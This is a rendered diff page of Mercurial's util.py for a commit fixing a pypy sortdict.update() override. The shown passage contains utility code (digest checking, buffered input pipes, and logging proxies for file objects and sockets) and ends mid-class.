##// END OF EJS Templates
util: fix the signature for the pypy override of sortdict.update()...
Matt Harbison -
r47662:64400d05 default
parent child Browse files
Show More
@@ -1,3730 +1,3732 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import locale
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37
38 38 from .thirdparty import attr
39 39 from .pycompat import (
40 40 delattr,
41 41 getattr,
42 42 open,
43 43 setattr,
44 44 )
45 45 from .node import hex
46 46 from hgdemandimport import tracing
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 policy,
52 52 pycompat,
53 53 urllibcompat,
54 54 )
55 55 from .utils import (
56 56 compression,
57 57 hashutil,
58 58 procutil,
59 59 stringutil,
60 60 )
61 61
62 62 if pycompat.TYPE_CHECKING:
63 63 from typing import (
64 64 Iterator,
65 65 List,
66 66 Optional,
67 67 Tuple,
68 68 Union,
69 69 )
70 70
71 71
72 72 base85 = policy.importmod('base85')
73 73 osutil = policy.importmod('osutil')
74 74
75 75 b85decode = base85.b85decode
76 76 b85encode = base85.b85encode
77 77
78 78 cookielib = pycompat.cookielib
79 79 httplib = pycompat.httplib
80 80 pickle = pycompat.pickle
81 81 safehasattr = pycompat.safehasattr
82 82 socketserver = pycompat.socketserver
83 83 bytesio = pycompat.bytesio
84 84 # TODO deprecate stringio name, as it is a lie on Python 3.
85 85 stringio = bytesio
86 86 xmlrpclib = pycompat.xmlrpclib
87 87
88 88 httpserver = urllibcompat.httpserver
89 89 urlerr = urllibcompat.urlerr
90 90 urlreq = urllibcompat.urlreq
91 91
92 92 # workaround for win32mbcs
93 93 _filenamebytestr = pycompat.bytestr
94 94
95 95 if pycompat.iswindows:
96 96 from . import windows as platform
97 97 else:
98 98 from . import posix as platform
99 99
100 100 _ = i18n._
101 101
102 102 bindunixsocket = platform.bindunixsocket
103 103 cachestat = platform.cachestat
104 104 checkexec = platform.checkexec
105 105 checklink = platform.checklink
106 106 copymode = platform.copymode
107 107 expandglobs = platform.expandglobs
108 108 getfsmountpoint = platform.getfsmountpoint
109 109 getfstype = platform.getfstype
110 110 groupmembers = platform.groupmembers
111 111 groupname = platform.groupname
112 112 isexec = platform.isexec
113 113 isowner = platform.isowner
114 114 listdir = osutil.listdir
115 115 localpath = platform.localpath
116 116 lookupreg = platform.lookupreg
117 117 makedir = platform.makedir
118 118 nlinks = platform.nlinks
119 119 normpath = platform.normpath
120 120 normcase = platform.normcase
121 121 normcasespec = platform.normcasespec
122 122 normcasefallback = platform.normcasefallback
123 123 openhardlinks = platform.openhardlinks
124 124 oslink = platform.oslink
125 125 parsepatchoutput = platform.parsepatchoutput
126 126 pconvert = platform.pconvert
127 127 poll = platform.poll
128 128 posixfile = platform.posixfile
129 129 readlink = platform.readlink
130 130 rename = platform.rename
131 131 removedirs = platform.removedirs
132 132 samedevice = platform.samedevice
133 133 samefile = platform.samefile
134 134 samestat = platform.samestat
135 135 setflags = platform.setflags
136 136 split = platform.split
137 137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
138 138 statisexec = platform.statisexec
139 139 statislink = platform.statislink
140 140 umask = platform.umask
141 141 unlink = platform.unlink
142 142 username = platform.username
143 143
144 144
145 145 def setumask(val):
146 146 # type: (int) -> None
147 147 ''' updates the umask. used by chg server '''
148 148 if pycompat.iswindows:
149 149 return
150 150 os.umask(val)
151 151 global umask
152 152 platform.umask = umask = val & 0o777
153 153
154 154
155 155 # small compat layer
156 156 compengines = compression.compengines
157 157 SERVERROLE = compression.SERVERROLE
158 158 CLIENTROLE = compression.CLIENTROLE
159 159
160 160 try:
161 161 recvfds = osutil.recvfds
162 162 except AttributeError:
163 163 pass
164 164
165 165 # Python compatibility
166 166
167 167 _notset = object()
168 168
169 169
170 170 def bitsfrom(container):
171 171 bits = 0
172 172 for bit in container:
173 173 bits |= bit
174 174 return bits
175 175
176 176
177 177 # python 2.6 still have deprecation warning enabled by default. We do not want
178 178 # to display anything to standard user so detect if we are running test and
179 179 # only use python deprecation warning in this case.
180 180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
181 181 if _dowarn:
182 182 # explicitly unfilter our warning for python 2.7
183 183 #
184 184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
189 189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
190 190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
191 191 if _dowarn and pycompat.ispy3:
192 192 # silence warning emitted by passing user string to re.sub()
193 193 warnings.filterwarnings(
194 194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
195 195 )
196 196 warnings.filterwarnings(
197 197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
198 198 )
199 199 # TODO: reinvent imp.is_frozen()
200 200 warnings.filterwarnings(
201 201 'ignore',
202 202 'the imp module is deprecated',
203 203 DeprecationWarning,
204 204 'mercurial',
205 205 )
206 206
207 207
208 208 def nouideprecwarn(msg, version, stacklevel=1):
209 209 """Issue an python native deprecation warning
210 210
211 211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 212 """
213 213 if _dowarn:
214 214 msg += (
215 215 b"\n(compatibility will be dropped after Mercurial-%s,"
216 216 b" update your code.)"
217 217 ) % version
218 218 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
219 219 # on python 3 with chg, we will need to explicitly flush the output
220 220 sys.stderr.flush()
221 221
222 222
223 223 DIGESTS = {
224 224 b'md5': hashlib.md5,
225 225 b'sha1': hashutil.sha1,
226 226 b'sha512': hashlib.sha512,
227 227 }
228 228 # List of digest types from strongest to weakest
229 229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 assert k in DIGESTS
233 233
234 234
235 235 class digester(object):
236 236 """helper to compute digests.
237 237
238 238 This helper can be used to compute one or more digests given their name.
239 239
240 240 >>> d = digester([b'md5', b'sha1'])
241 241 >>> d.update(b'foo')
242 242 >>> [k for k in sorted(d)]
243 243 ['md5', 'sha1']
244 244 >>> d[b'md5']
245 245 'acbd18db4cc2f85cedef654fccc4a4d8'
246 246 >>> d[b'sha1']
247 247 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
248 248 >>> digester.preferred([b'md5', b'sha1'])
249 249 'sha1'
250 250 """
251 251
252 252 def __init__(self, digests, s=b''):
253 253 self._hashes = {}
254 254 for k in digests:
255 255 if k not in DIGESTS:
256 256 raise error.Abort(_(b'unknown digest type: %s') % k)
257 257 self._hashes[k] = DIGESTS[k]()
258 258 if s:
259 259 self.update(s)
260 260
261 261 def update(self, data):
262 262 for h in self._hashes.values():
263 263 h.update(data)
264 264
265 265 def __getitem__(self, key):
266 266 if key not in DIGESTS:
267 267 raise error.Abort(_(b'unknown digest type: %s') % k)
268 268 return hex(self._hashes[key].digest())
269 269
270 270 def __iter__(self):
271 271 return iter(self._hashes)
272 272
273 273 @staticmethod
274 274 def preferred(supported):
275 275 """returns the strongest digest type in both supported and DIGESTS."""
276 276
277 277 for k in DIGESTS_BY_STRENGTH:
278 278 if k in supported:
279 279 return k
280 280 return None
281 281
282 282
283 283 class digestchecker(object):
284 284 """file handle wrapper that additionally checks content against a given
285 285 size and digests.
286 286
287 287 d = digestchecker(fh, size, {'md5': '...'})
288 288
289 289 When multiple digests are given, all of them are validated.
290 290 """
291 291
292 292 def __init__(self, fh, size, digests):
293 293 self._fh = fh
294 294 self._size = size
295 295 self._got = 0
296 296 self._digests = dict(digests)
297 297 self._digester = digester(self._digests.keys())
298 298
299 299 def read(self, length=-1):
300 300 content = self._fh.read(length)
301 301 self._digester.update(content)
302 302 self._got += len(content)
303 303 return content
304 304
305 305 def validate(self):
306 306 if self._size != self._got:
307 307 raise error.Abort(
308 308 _(b'size mismatch: expected %d, got %d')
309 309 % (self._size, self._got)
310 310 )
311 311 for k, v in self._digests.items():
312 312 if v != self._digester[k]:
313 313 # i18n: first parameter is a digest name
314 314 raise error.Abort(
315 315 _(b'%s mismatch: expected %s, got %s')
316 316 % (k, v, self._digester[k])
317 317 )
318 318
319 319
320 320 try:
321 321 buffer = buffer # pytype: disable=name-error
322 322 except NameError:
323 323
324 324 def buffer(sliceable, offset=0, length=None):
325 325 if length is not None:
326 326 return memoryview(sliceable)[offset : offset + length]
327 327 return memoryview(sliceable)[offset:]
328 328
329 329
330 330 _chunksize = 4096
331 331
332 332
333 333 class bufferedinputpipe(object):
334 334 """a manually buffered input pipe
335 335
336 336 Python will not let us use buffered IO and lazy reading with 'polling' at
337 337 the same time. We cannot probe the buffer state and select will not detect
338 338 that data are ready to read if they are already buffered.
339 339
340 340 This class let us work around that by implementing its own buffering
341 341 (allowing efficient readline) while offering a way to know if the buffer is
342 342 empty from the output (allowing collaboration of the buffer with polling).
343 343
344 344 This class lives in the 'util' module because it makes use of the 'os'
345 345 module from the python stdlib.
346 346 """
347 347
348 348 def __new__(cls, fh):
349 349 # If we receive a fileobjectproxy, we need to use a variation of this
350 350 # class that notifies observers about activity.
351 351 if isinstance(fh, fileobjectproxy):
352 352 cls = observedbufferedinputpipe
353 353
354 354 return super(bufferedinputpipe, cls).__new__(cls)
355 355
356 356 def __init__(self, input):
357 357 self._input = input
358 358 self._buffer = []
359 359 self._eof = False
360 360 self._lenbuf = 0
361 361
362 362 @property
363 363 def hasbuffer(self):
364 364 """True is any data is currently buffered
365 365
366 366 This will be used externally a pre-step for polling IO. If there is
367 367 already data then no polling should be set in place."""
368 368 return bool(self._buffer)
369 369
370 370 @property
371 371 def closed(self):
372 372 return self._input.closed
373 373
374 374 def fileno(self):
375 375 return self._input.fileno()
376 376
377 377 def close(self):
378 378 return self._input.close()
379 379
380 380 def read(self, size):
381 381 while (not self._eof) and (self._lenbuf < size):
382 382 self._fillbuffer()
383 383 return self._frombuffer(size)
384 384
385 385 def unbufferedread(self, size):
386 386 if not self._eof and self._lenbuf == 0:
387 387 self._fillbuffer(max(size, _chunksize))
388 388 return self._frombuffer(min(self._lenbuf, size))
389 389
390 390 def readline(self, *args, **kwargs):
391 391 if len(self._buffer) > 1:
392 392 # this should not happen because both read and readline end with a
393 393 # _frombuffer call that collapse it.
394 394 self._buffer = [b''.join(self._buffer)]
395 395 self._lenbuf = len(self._buffer[0])
396 396 lfi = -1
397 397 if self._buffer:
398 398 lfi = self._buffer[-1].find(b'\n')
399 399 while (not self._eof) and lfi < 0:
400 400 self._fillbuffer()
401 401 if self._buffer:
402 402 lfi = self._buffer[-1].find(b'\n')
403 403 size = lfi + 1
404 404 if lfi < 0: # end of file
405 405 size = self._lenbuf
406 406 elif len(self._buffer) > 1:
407 407 # we need to take previous chunks into account
408 408 size += self._lenbuf - len(self._buffer[-1])
409 409 return self._frombuffer(size)
410 410
411 411 def _frombuffer(self, size):
412 412 """return at most 'size' data from the buffer
413 413
414 414 The data are removed from the buffer."""
415 415 if size == 0 or not self._buffer:
416 416 return b''
417 417 buf = self._buffer[0]
418 418 if len(self._buffer) > 1:
419 419 buf = b''.join(self._buffer)
420 420
421 421 data = buf[:size]
422 422 buf = buf[len(data) :]
423 423 if buf:
424 424 self._buffer = [buf]
425 425 self._lenbuf = len(buf)
426 426 else:
427 427 self._buffer = []
428 428 self._lenbuf = 0
429 429 return data
430 430
431 431 def _fillbuffer(self, size=_chunksize):
432 432 """read data to the buffer"""
433 433 data = os.read(self._input.fileno(), size)
434 434 if not data:
435 435 self._eof = True
436 436 else:
437 437 self._lenbuf += len(data)
438 438 self._buffer.append(data)
439 439
440 440 return data
441 441
442 442
443 443 def mmapread(fp, size=None):
444 444 if size == 0:
445 445 # size of 0 to mmap.mmap() means "all data"
446 446 # rather than "zero bytes", so special case that.
447 447 return b''
448 448 elif size is None:
449 449 size = 0
450 450 try:
451 451 fd = getattr(fp, 'fileno', lambda: fp)()
452 452 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
453 453 except ValueError:
454 454 # Empty files cannot be mmapped, but mmapread should still work. Check
455 455 # if the file is empty, and if so, return an empty buffer.
456 456 if os.fstat(fd).st_size == 0:
457 457 return b''
458 458 raise
459 459
460 460
461 461 class fileobjectproxy(object):
462 462 """A proxy around file objects that tells a watcher when events occur.
463 463
464 464 This type is intended to only be used for testing purposes. Think hard
465 465 before using it in important code.
466 466 """
467 467
468 468 __slots__ = (
469 469 '_orig',
470 470 '_observer',
471 471 )
472 472
473 473 def __init__(self, fh, observer):
474 474 object.__setattr__(self, '_orig', fh)
475 475 object.__setattr__(self, '_observer', observer)
476 476
477 477 def __getattribute__(self, name):
478 478 ours = {
479 479 '_observer',
480 480 # IOBase
481 481 'close',
482 482 # closed if a property
483 483 'fileno',
484 484 'flush',
485 485 'isatty',
486 486 'readable',
487 487 'readline',
488 488 'readlines',
489 489 'seek',
490 490 'seekable',
491 491 'tell',
492 492 'truncate',
493 493 'writable',
494 494 'writelines',
495 495 # RawIOBase
496 496 'read',
497 497 'readall',
498 498 'readinto',
499 499 'write',
500 500 # BufferedIOBase
501 501 # raw is a property
502 502 'detach',
503 503 # read defined above
504 504 'read1',
505 505 # readinto defined above
506 506 # write defined above
507 507 }
508 508
509 509 # We only observe some methods.
510 510 if name in ours:
511 511 return object.__getattribute__(self, name)
512 512
513 513 return getattr(object.__getattribute__(self, '_orig'), name)
514 514
515 515 def __nonzero__(self):
516 516 return bool(object.__getattribute__(self, '_orig'))
517 517
518 518 __bool__ = __nonzero__
519 519
520 520 def __delattr__(self, name):
521 521 return delattr(object.__getattribute__(self, '_orig'), name)
522 522
523 523 def __setattr__(self, name, value):
524 524 return setattr(object.__getattribute__(self, '_orig'), name, value)
525 525
526 526 def __iter__(self):
527 527 return object.__getattribute__(self, '_orig').__iter__()
528 528
529 529 def _observedcall(self, name, *args, **kwargs):
530 530 # Call the original object.
531 531 orig = object.__getattribute__(self, '_orig')
532 532 res = getattr(orig, name)(*args, **kwargs)
533 533
534 534 # Call a method on the observer of the same name with arguments
535 535 # so it can react, log, etc.
536 536 observer = object.__getattribute__(self, '_observer')
537 537 fn = getattr(observer, name, None)
538 538 if fn:
539 539 fn(res, *args, **kwargs)
540 540
541 541 return res
542 542
543 543 def close(self, *args, **kwargs):
544 544 return object.__getattribute__(self, '_observedcall')(
545 545 'close', *args, **kwargs
546 546 )
547 547
548 548 def fileno(self, *args, **kwargs):
549 549 return object.__getattribute__(self, '_observedcall')(
550 550 'fileno', *args, **kwargs
551 551 )
552 552
553 553 def flush(self, *args, **kwargs):
554 554 return object.__getattribute__(self, '_observedcall')(
555 555 'flush', *args, **kwargs
556 556 )
557 557
558 558 def isatty(self, *args, **kwargs):
559 559 return object.__getattribute__(self, '_observedcall')(
560 560 'isatty', *args, **kwargs
561 561 )
562 562
563 563 def readable(self, *args, **kwargs):
564 564 return object.__getattribute__(self, '_observedcall')(
565 565 'readable', *args, **kwargs
566 566 )
567 567
568 568 def readline(self, *args, **kwargs):
569 569 return object.__getattribute__(self, '_observedcall')(
570 570 'readline', *args, **kwargs
571 571 )
572 572
573 573 def readlines(self, *args, **kwargs):
574 574 return object.__getattribute__(self, '_observedcall')(
575 575 'readlines', *args, **kwargs
576 576 )
577 577
578 578 def seek(self, *args, **kwargs):
579 579 return object.__getattribute__(self, '_observedcall')(
580 580 'seek', *args, **kwargs
581 581 )
582 582
583 583 def seekable(self, *args, **kwargs):
584 584 return object.__getattribute__(self, '_observedcall')(
585 585 'seekable', *args, **kwargs
586 586 )
587 587
588 588 def tell(self, *args, **kwargs):
589 589 return object.__getattribute__(self, '_observedcall')(
590 590 'tell', *args, **kwargs
591 591 )
592 592
593 593 def truncate(self, *args, **kwargs):
594 594 return object.__getattribute__(self, '_observedcall')(
595 595 'truncate', *args, **kwargs
596 596 )
597 597
598 598 def writable(self, *args, **kwargs):
599 599 return object.__getattribute__(self, '_observedcall')(
600 600 'writable', *args, **kwargs
601 601 )
602 602
603 603 def writelines(self, *args, **kwargs):
604 604 return object.__getattribute__(self, '_observedcall')(
605 605 'writelines', *args, **kwargs
606 606 )
607 607
608 608 def read(self, *args, **kwargs):
609 609 return object.__getattribute__(self, '_observedcall')(
610 610 'read', *args, **kwargs
611 611 )
612 612
613 613 def readall(self, *args, **kwargs):
614 614 return object.__getattribute__(self, '_observedcall')(
615 615 'readall', *args, **kwargs
616 616 )
617 617
618 618 def readinto(self, *args, **kwargs):
619 619 return object.__getattribute__(self, '_observedcall')(
620 620 'readinto', *args, **kwargs
621 621 )
622 622
623 623 def write(self, *args, **kwargs):
624 624 return object.__getattribute__(self, '_observedcall')(
625 625 'write', *args, **kwargs
626 626 )
627 627
628 628 def detach(self, *args, **kwargs):
629 629 return object.__getattribute__(self, '_observedcall')(
630 630 'detach', *args, **kwargs
631 631 )
632 632
633 633 def read1(self, *args, **kwargs):
634 634 return object.__getattribute__(self, '_observedcall')(
635 635 'read1', *args, **kwargs
636 636 )
637 637
638 638
639 639 class observedbufferedinputpipe(bufferedinputpipe):
640 640 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
641 641
642 642 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
643 643 bypass ``fileobjectproxy``. Because of this, we need to make
644 644 ``bufferedinputpipe`` aware of these operations.
645 645
646 646 This variation of ``bufferedinputpipe`` can notify observers about
647 647 ``os.read()`` events. It also re-publishes other events, such as
648 648 ``read()`` and ``readline()``.
649 649 """
650 650
651 651 def _fillbuffer(self):
652 652 res = super(observedbufferedinputpipe, self)._fillbuffer()
653 653
654 654 fn = getattr(self._input._observer, 'osread', None)
655 655 if fn:
656 656 fn(res, _chunksize)
657 657
658 658 return res
659 659
660 660 # We use different observer methods because the operation isn't
661 661 # performed on the actual file object but on us.
662 662 def read(self, size):
663 663 res = super(observedbufferedinputpipe, self).read(size)
664 664
665 665 fn = getattr(self._input._observer, 'bufferedread', None)
666 666 if fn:
667 667 fn(res, size)
668 668
669 669 return res
670 670
671 671 def readline(self, *args, **kwargs):
672 672 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
673 673
674 674 fn = getattr(self._input._observer, 'bufferedreadline', None)
675 675 if fn:
676 676 fn(res)
677 677
678 678 return res
679 679
680 680
681 681 PROXIED_SOCKET_METHODS = {
682 682 'makefile',
683 683 'recv',
684 684 'recvfrom',
685 685 'recvfrom_into',
686 686 'recv_into',
687 687 'send',
688 688 'sendall',
689 689 'sendto',
690 690 'setblocking',
691 691 'settimeout',
692 692 'gettimeout',
693 693 'setsockopt',
694 694 }
695 695
696 696
697 697 class socketproxy(object):
698 698 """A proxy around a socket that tells a watcher when events occur.
699 699
700 700 This is like ``fileobjectproxy`` except for sockets.
701 701
702 702 This type is intended to only be used for testing purposes. Think hard
703 703 before using it in important code.
704 704 """
705 705
706 706 __slots__ = (
707 707 '_orig',
708 708 '_observer',
709 709 )
710 710
711 711 def __init__(self, sock, observer):
712 712 object.__setattr__(self, '_orig', sock)
713 713 object.__setattr__(self, '_observer', observer)
714 714
715 715 def __getattribute__(self, name):
716 716 if name in PROXIED_SOCKET_METHODS:
717 717 return object.__getattribute__(self, name)
718 718
719 719 return getattr(object.__getattribute__(self, '_orig'), name)
720 720
721 721 def __delattr__(self, name):
722 722 return delattr(object.__getattribute__(self, '_orig'), name)
723 723
724 724 def __setattr__(self, name, value):
725 725 return setattr(object.__getattribute__(self, '_orig'), name, value)
726 726
727 727 def __nonzero__(self):
728 728 return bool(object.__getattribute__(self, '_orig'))
729 729
730 730 __bool__ = __nonzero__
731 731
732 732 def _observedcall(self, name, *args, **kwargs):
733 733 # Call the original object.
734 734 orig = object.__getattribute__(self, '_orig')
735 735 res = getattr(orig, name)(*args, **kwargs)
736 736
737 737 # Call a method on the observer of the same name with arguments
738 738 # so it can react, log, etc.
739 739 observer = object.__getattribute__(self, '_observer')
740 740 fn = getattr(observer, name, None)
741 741 if fn:
742 742 fn(res, *args, **kwargs)
743 743
744 744 return res
745 745
746 746 def makefile(self, *args, **kwargs):
747 747 res = object.__getattribute__(self, '_observedcall')(
748 748 'makefile', *args, **kwargs
749 749 )
750 750
751 751 # The file object may be used for I/O. So we turn it into a
752 752 # proxy using our observer.
753 753 observer = object.__getattribute__(self, '_observer')
754 754 return makeloggingfileobject(
755 755 observer.fh,
756 756 res,
757 757 observer.name,
758 758 reads=observer.reads,
759 759 writes=observer.writes,
760 760 logdata=observer.logdata,
761 761 logdataapis=observer.logdataapis,
762 762 )
763 763
764 764 def recv(self, *args, **kwargs):
765 765 return object.__getattribute__(self, '_observedcall')(
766 766 'recv', *args, **kwargs
767 767 )
768 768
769 769 def recvfrom(self, *args, **kwargs):
770 770 return object.__getattribute__(self, '_observedcall')(
771 771 'recvfrom', *args, **kwargs
772 772 )
773 773
774 774 def recvfrom_into(self, *args, **kwargs):
775 775 return object.__getattribute__(self, '_observedcall')(
776 776 'recvfrom_into', *args, **kwargs
777 777 )
778 778
779 779 def recv_into(self, *args, **kwargs):
780 780 return object.__getattribute__(self, '_observedcall')(
781 781 'recv_info', *args, **kwargs
782 782 )
783 783
784 784 def send(self, *args, **kwargs):
785 785 return object.__getattribute__(self, '_observedcall')(
786 786 'send', *args, **kwargs
787 787 )
788 788
789 789 def sendall(self, *args, **kwargs):
790 790 return object.__getattribute__(self, '_observedcall')(
791 791 'sendall', *args, **kwargs
792 792 )
793 793
794 794 def sendto(self, *args, **kwargs):
795 795 return object.__getattribute__(self, '_observedcall')(
796 796 'sendto', *args, **kwargs
797 797 )
798 798
799 799 def setblocking(self, *args, **kwargs):
800 800 return object.__getattribute__(self, '_observedcall')(
801 801 'setblocking', *args, **kwargs
802 802 )
803 803
804 804 def settimeout(self, *args, **kwargs):
805 805 return object.__getattribute__(self, '_observedcall')(
806 806 'settimeout', *args, **kwargs
807 807 )
808 808
809 809 def gettimeout(self, *args, **kwargs):
810 810 return object.__getattribute__(self, '_observedcall')(
811 811 'gettimeout', *args, **kwargs
812 812 )
813 813
814 814 def setsockopt(self, *args, **kwargs):
815 815 return object.__getattribute__(self, '_observedcall')(
816 816 'setsockopt', *args, **kwargs
817 817 )
818 818
819 819
820 820 class baseproxyobserver(object):
821 821 def __init__(self, fh, name, logdata, logdataapis):
822 822 self.fh = fh
823 823 self.name = name
824 824 self.logdata = logdata
825 825 self.logdataapis = logdataapis
826 826
827 827 def _writedata(self, data):
828 828 if not self.logdata:
829 829 if self.logdataapis:
830 830 self.fh.write(b'\n')
831 831 self.fh.flush()
832 832 return
833 833
834 834 # Simple case writes all data on a single line.
835 835 if b'\n' not in data:
836 836 if self.logdataapis:
837 837 self.fh.write(b': %s\n' % stringutil.escapestr(data))
838 838 else:
839 839 self.fh.write(
840 840 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
841 841 )
842 842 self.fh.flush()
843 843 return
844 844
845 845 # Data with newlines is written to multiple lines.
846 846 if self.logdataapis:
847 847 self.fh.write(b':\n')
848 848
849 849 lines = data.splitlines(True)
850 850 for line in lines:
851 851 self.fh.write(
852 852 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
853 853 )
854 854 self.fh.flush()
855 855
856 856
857 857 class fileobjectobserver(baseproxyobserver):
858 858 """Logs file object activity."""
859 859
860 860 def __init__(
861 861 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
862 862 ):
863 863 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
864 864 self.reads = reads
865 865 self.writes = writes
866 866
867 867 def read(self, res, size=-1):
868 868 if not self.reads:
869 869 return
870 870 # Python 3 can return None from reads at EOF instead of empty strings.
871 871 if res is None:
872 872 res = b''
873 873
874 874 if size == -1 and res == b'':
875 875 # Suppress pointless read(-1) calls that return
876 876 # nothing. These happen _a lot_ on Python 3, and there
877 877 # doesn't seem to be a better workaround to have matching
878 878 # Python 2 and 3 behavior. :(
879 879 return
880 880
881 881 if self.logdataapis:
882 882 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
883 883
884 884 self._writedata(res)
885 885
886 886 def readline(self, res, limit=-1):
887 887 if not self.reads:
888 888 return
889 889
890 890 if self.logdataapis:
891 891 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
892 892
893 893 self._writedata(res)
894 894
895 895 def readinto(self, res, dest):
896 896 if not self.reads:
897 897 return
898 898
899 899 if self.logdataapis:
900 900 self.fh.write(
901 901 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
902 902 )
903 903
904 904 data = dest[0:res] if res is not None else b''
905 905
906 906 # _writedata() uses "in" operator and is confused by memoryview because
907 907 # characters are ints on Python 3.
908 908 if isinstance(data, memoryview):
909 909 data = data.tobytes()
910 910
911 911 self._writedata(data)
912 912
913 913 def write(self, res, data):
914 914 if not self.writes:
915 915 return
916 916
917 917 # Python 2 returns None from some write() calls. Python 3 (reasonably)
918 918 # returns the integer bytes written.
919 919 if res is None and data:
920 920 res = len(data)
921 921
922 922 if self.logdataapis:
923 923 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
924 924
925 925 self._writedata(data)
926 926
927 927 def flush(self, res):
928 928 if not self.writes:
929 929 return
930 930
931 931 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
932 932
933 933 # For observedbufferedinputpipe.
934 934 def bufferedread(self, res, size):
935 935 if not self.reads:
936 936 return
937 937
938 938 if self.logdataapis:
939 939 self.fh.write(
940 940 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
941 941 )
942 942
943 943 self._writedata(res)
944 944
945 945 def bufferedreadline(self, res):
946 946 if not self.reads:
947 947 return
948 948
949 949 if self.logdataapis:
950 950 self.fh.write(
951 951 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
952 952 )
953 953
954 954 self._writedata(res)
955 955
956 956
957 957 def makeloggingfileobject(
958 958 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
959 959 ):
960 960 """Turn a file object into a logging file object."""
961 961
962 962 observer = fileobjectobserver(
963 963 logh,
964 964 name,
965 965 reads=reads,
966 966 writes=writes,
967 967 logdata=logdata,
968 968 logdataapis=logdataapis,
969 969 )
970 970 return fileobjectproxy(fh, observer)
971 971
972 972
973 973 class socketobserver(baseproxyobserver):
974 974 """Logs socket activity."""
975 975
976 976 def __init__(
977 977 self,
978 978 fh,
979 979 name,
980 980 reads=True,
981 981 writes=True,
982 982 states=True,
983 983 logdata=False,
984 984 logdataapis=True,
985 985 ):
986 986 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
987 987 self.reads = reads
988 988 self.writes = writes
989 989 self.states = states
990 990
991 991 def makefile(self, res, mode=None, bufsize=None):
992 992 if not self.states:
993 993 return
994 994
995 995 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
996 996
997 997 def recv(self, res, size, flags=0):
998 998 if not self.reads:
999 999 return
1000 1000
1001 1001 if self.logdataapis:
1002 1002 self.fh.write(
1003 1003 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
1004 1004 )
1005 1005 self._writedata(res)
1006 1006
1007 1007 def recvfrom(self, res, size, flags=0):
1008 1008 if not self.reads:
1009 1009 return
1010 1010
1011 1011 if self.logdataapis:
1012 1012 self.fh.write(
1013 1013 b'%s> recvfrom(%d, %d) -> %d'
1014 1014 % (self.name, size, flags, len(res[0]))
1015 1015 )
1016 1016
1017 1017 self._writedata(res[0])
1018 1018
1019 1019 def recvfrom_into(self, res, buf, size, flags=0):
1020 1020 if not self.reads:
1021 1021 return
1022 1022
1023 1023 if self.logdataapis:
1024 1024 self.fh.write(
1025 1025 b'%s> recvfrom_into(%d, %d) -> %d'
1026 1026 % (self.name, size, flags, res[0])
1027 1027 )
1028 1028
1029 1029 self._writedata(buf[0 : res[0]])
1030 1030
1031 1031 def recv_into(self, res, buf, size=0, flags=0):
1032 1032 if not self.reads:
1033 1033 return
1034 1034
1035 1035 if self.logdataapis:
1036 1036 self.fh.write(
1037 1037 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1038 1038 )
1039 1039
1040 1040 self._writedata(buf[0:res])
1041 1041
1042 1042 def send(self, res, data, flags=0):
1043 1043 if not self.writes:
1044 1044 return
1045 1045
1046 1046 self.fh.write(
1047 1047 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1048 1048 )
1049 1049 self._writedata(data)
1050 1050
1051 1051 def sendall(self, res, data, flags=0):
1052 1052 if not self.writes:
1053 1053 return
1054 1054
1055 1055 if self.logdataapis:
1056 1056 # Returns None on success. So don't bother reporting return value.
1057 1057 self.fh.write(
1058 1058 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1059 1059 )
1060 1060
1061 1061 self._writedata(data)
1062 1062
1063 1063 def sendto(self, res, data, flagsoraddress, address=None):
